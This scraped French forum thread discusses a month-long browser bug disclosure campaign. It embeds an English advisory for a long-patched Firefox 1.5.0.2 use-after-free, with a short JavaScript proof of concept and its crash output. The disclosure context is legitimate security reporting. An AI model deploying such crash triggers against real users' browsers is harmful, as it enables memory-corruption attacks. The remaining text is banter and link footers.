Donc le pari est déjà perdant!The following bug was tested on Mozilla Firefox 1.5.0.2 running on Gentoo Linux. This bug was fixed in Firefox 1.5.0.3, after three other people reported this issue to Mozilla. This bug results in a function pointer being called that no longer exists on the heap. Exploiting it is more annoying than difficult, since getting user-provided memory to map over the free'd object pointer is more convoluted than it should be.
document.designMode = "on";
for (i=0; i < 300; i++) {
document.execCommand("InsertHTML", false, "<iframe src='localhost'/>");
}
document.designMode = "off";
window.location.reload(true);
Demonstration
EIP on Gentoo Linux / Firefox 1.5.0.1
0x00737069 in ?? ()
This bug was addressed in MFSA2006-30.
This bug has been added to the OSVDB:
Mozilla Firefox iframe.contentWindow.focus() Overflow
Noooooon, pas possible... on m'aurait menti ? :paf:ouaybe a écrit:
ActiveX serait-il un nid à bugs ?!?
v_atekor a écrit:
:MDR:
Y'en a qui ont de l'humour, mais je ne sais pas si les éditeurs vont vraiment rigoler ;)
EDIT:
je viens de voir que certains bugs (Fx) sont corrigés aujourd'hui !!
Donc le pari est déjà perdant!
En fait la plus part des failles concernent IE6, ont été rapportées à MS, et ne sont pas fixées.
12 failles révélées
10 failles Internet Explorer non corrigées
1 faille Safari non corrigée
1 faille Firefox corrigée.
Le paris n'est pas d'avoir 31 failles non corrigés a la fin du mois mais de découvrir un faille par jour...je viens de voir que certains bugs (Fx) sont corrigés aujourd'hui !!
Donc le pari est déjà perdant!
Perso, si je devait recuperer le code d'un carte banquaire j'ai 2 solutions :Cette femme avait littéralement dit qu'elle ne donnerait jamais son numéro de CB sur le net
guinnessman a écrit:
Ca deviend lourd ces mecs dont la seule passion dans la vie est de baver sur le travail des autres alors qu'eux seraient très certainement incapables de faire mieux, voir même simplement d'en faire autant (sans prendre partie pour aucun des navigateurs cités)
guinnessman a écrit:
Ca deviend lourd ces mecs dont la seule passion dans la vie est de baver sur le travail des autres alors qu'eux seraient très certainement incapables de faire mieux, voir même simplement d'en faire autant (sans prendre partie pour aucun des navigateurs cités)
Ouais, comme tous ces gars qui crachent sur Zidane ou son acolyte italien alors qu'ils sont incapables de jouer au niveau mondial... :paf:guinnessman a écrit:
Ca deviend lourd ces mecs dont la seule passion dans la vie est de baver sur le travail des autres alors qu'eux seraient très certainement incapables de faire mieux, voir même simplement d'en faire autant (sans prendre partie pour aucun des navigateurs cités)
Moi je trouve ça très sain... Flambeur certes, mais sain. Au moins y'a de la pub autour des vulnérabilités, et on est loin de la pub "Firefox sans faille".BetaGamma a écrit:
Franchement, je n'aime pas ce genre de comportements.
Tu as déjà essayé de prendre en main un code de plusieurs milliers de lignes pour trouver des failles qui parfois se trouvent dans l'inversion de 2 caractères ? :pt1cable:RuTT a écrit:
En même temps...le code de Firefox est ouvert, je me demande s'il se complique pas un peu la vie. Quoi que pour comprendre le code et son architecture...
'Bien ce que je dis.Predicator a écrit:
Tu as déjà essayé de prendre en main un code de plusieurs milliers de lignes pour trouver des failles qui parfois se trouvent dans l'inversion de 2 caractères ? :pt1cable:
Sujets Similaires: Découvrez aussi :
AchetezFacile (Comparateur de prix) -
JeuxVideo.fr -
Neteco -
Ozap -
Mobinaute -
JeuxVideo.TV (Emissions TV)
Echanges de Liens :
Allociné (Cinéma, VOD) -
Cityvox (Paris) -
Franchise Jeux Vidéo -
Boursier.com (Bourse Quotidien) -
Infobebes (Grossesse)
Culture Jeux (Encyclopédie) -
Webdistrib (Matériel Informatique) -
Locafilm (Location DVD) -
Pixmania (GPS Garmin) -
auFeminin (beauté, mode)
Sur cette page : Juillet : une faille par jour pour les navigateurs : Un certain HD Moore, qui n'.... Mots Clefs : informatique, PC, hardware, matériel, jeux vidéo, multimédia, logiciel, téléchar....
